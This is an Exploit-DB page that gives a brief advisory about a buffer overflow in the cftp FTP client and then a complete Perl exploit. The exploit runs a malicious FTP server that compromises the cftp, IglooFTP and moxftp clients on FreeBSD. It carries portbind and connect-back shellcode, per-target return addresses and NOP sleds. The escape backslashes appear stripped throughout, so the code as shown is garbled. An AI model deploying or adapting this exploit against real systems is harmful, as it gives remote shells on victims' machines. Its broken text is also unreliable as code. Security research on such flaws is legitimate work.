https://www.exploit-db.com/exploits/22890

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8160/info

A buffer overflow vulnerability has been reported in cftp. The vulnerability occurs when cftp is parsing 'Welcome' banner messages from remote FTP servers. When cftp receives an FTP banner exceeding a certain length, it will trigger the overflow condition. This could allow for execution of malicious code in the context of the FTP client.

#!/usr/bin/perl

# PoC exploit for iglooftp, cftp and moxftp for freebsd

# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1

# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..

# all the clients are from ports.. some may have been fixed, did this shit some 
# time ago..

# thanks to kokanin for help and advice
# code by inv[at]dtors

use IO::Socket;

sub convert_ret {
my($ret) = @_;
    
    for ($x=8; $x>0; $x=$x-2){
	$ret = substr($ret_temp,$x,2);
	$new_ret .= chr hex "$ret";
    }
return $new_ret;
}

sub convert_ip {
my($ip) = @_;

@ip_tmp = split(/./, $ip);

for($x=0; $x<4; $x++) {
    $new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Usage ./DSR-ftp_clients.pl Shellcode Client Ipn
tShellcode:t0 = Portbind
ttt1 = Connect backn
tClient:tt0 = IglooFTP (FreeBSD 4.7)
ttt1 = cftp (FreeBSD 4.7)
ttt2 = Moxftp (FreeBSD 4.7)
ttt3 = cftp (FreeBSD 5.0)
ttt4 = IglooFTP (FreeBSD 5.0)
ttt5 = Moxftp (FreeBSD 5.0)n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x52x66x68x27x10x66x51x89xe6xb1x10x51x56x50x50xb0x68xcdx80x51x53x53xb0x6axcdx80x52x52x53x53xb0x1excdx80xb1x03x89xc3xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80",
    "Connect Back,x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x68"."$user_ip"."x66x68x27x10x66x51x89xe6xb2x10x52x56x50x50xb0x62xcdx80x41xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "tDSR-ftp_clients by invn
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "x90"x@client_info[1];
    $nops_y = "x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 inv	inv	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "Can't listen on $server_port : $!n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_stringn";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcoden";
	while($request !=~ /QUIT/i) {
	    $request = <$client>;
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous logged in.n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Password required for anonymous.n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 Restarting.n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 Type set to A.n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 "/usr/home/inv/" is current directory.n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "Can't open passive port";
		print $client "227 Entering Passive Mode (127,0,0,1,40,84)n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 Starting transfer.n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG YOU ARE DEAD!!!n";
		}
	    }	
	
	}
    close $client;
    }
}